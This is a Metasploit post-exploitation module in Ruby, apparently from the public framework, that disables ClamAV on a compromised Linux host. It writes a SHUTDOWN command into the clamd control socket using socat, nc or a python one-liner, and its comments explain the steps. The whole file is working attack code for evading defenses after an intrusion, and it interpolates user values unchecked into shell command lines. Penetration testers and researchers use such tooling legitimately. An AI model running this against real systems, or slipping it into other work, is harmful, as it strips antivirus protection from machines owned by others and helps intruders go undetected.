Path: blob/master/modules/post/linux/manage/disable_clamav.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Unix

  # Post module that writes a single clamd control command (COMMAND, default
  # SHUTDOWN) into the ClamAV Unix socket on the compromised host.
  # The Notes record what a defender can expect: the scanning service stops
  # (SERVICE_RESOURCE_LOSS) and the request is visible in logs (IOC_IN_LOGS).
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Disable ClamAV',
        'Description' => %q{
          This module will write to the ClamAV Unix socket to shutoff ClamAV.
        },
        'License' => MSF_LICENSE,
        'Author' => ['DLL_Cool_J'],
        'Platform' => ['linux'],
        'SessionTypes' => %w[meterpreter shell],
        'Notes' => {
          'Stability' => [SERVICE_RESOURCE_LOSS],
          'Reliability' => [],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )
    register_options(
      [
        OptString.new('CLAMAV_UNIX_SOCKET', [true, 'ClamAV unix socket', '/run/clamav/clamd.ctl']),
        OptString.new('COMMAND', [true, 'ClamAV command to execute', 'SHUTDOWN'])
      ]
    )
  end

  # Locates the first usable client binary on the target (socat, nc, python,
  # python3 — in that order), builds the command line that pushes COMMAND into
  # the control socket, and runs it through the session.
  #
  # Aborts with Failure::NotFound when none of the candidate binaries exist.
  # The writability check on the socket path is informational only: its
  # outcome is printed, but execution continues either way and the "is
  # writable" message is printed unconditionally.
  def run
    socket_path = datastore['CLAMAV_UNIX_SOCKET']
    cmd = datastore['COMMAND']

    tool = %w[socat nc python python3].find { |bin| command_exists?(bin) }
    fail_with(Failure::NotFound, 'No suitable binary found on the target host. Quitting!') unless tool

    print_good("#{tool} exists")
    payload = client_command(tool, cmd, socket_path)

    print_status("Checking file path #{socket_path} exists and is writable... \n")
    print_bad('File does NOT exist or is not writable!') unless writable?(socket_path.to_s)
    print_good('File does exist and is writable!')
    print_good("Sending #{cmd}...")
    cmd_exec(payload)
  end

  private

  # Shell command line that delivers +cmd+ to the Unix socket at +socket_path+
  # using +tool+, which must be one of socat, nc, python or python3.
  # Both datastore values are interpolated verbatim into the command line.
  def client_command(tool, cmd, socket_path)
    case tool
    when 'socat'
      "echo #{cmd} | socat - UNIX-CONNECT:#{socket_path}"
    when 'nc'
      "echo #{cmd} | nc -U #{socket_path}"
    else
      # python and python3 share the same one-liner; only the interpreter name differs.
      "#{tool} -c \"import socket; sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM); sock.connect('#{socket_path}'); sock.send('#{cmd}'.encode());\""
    end
  end
end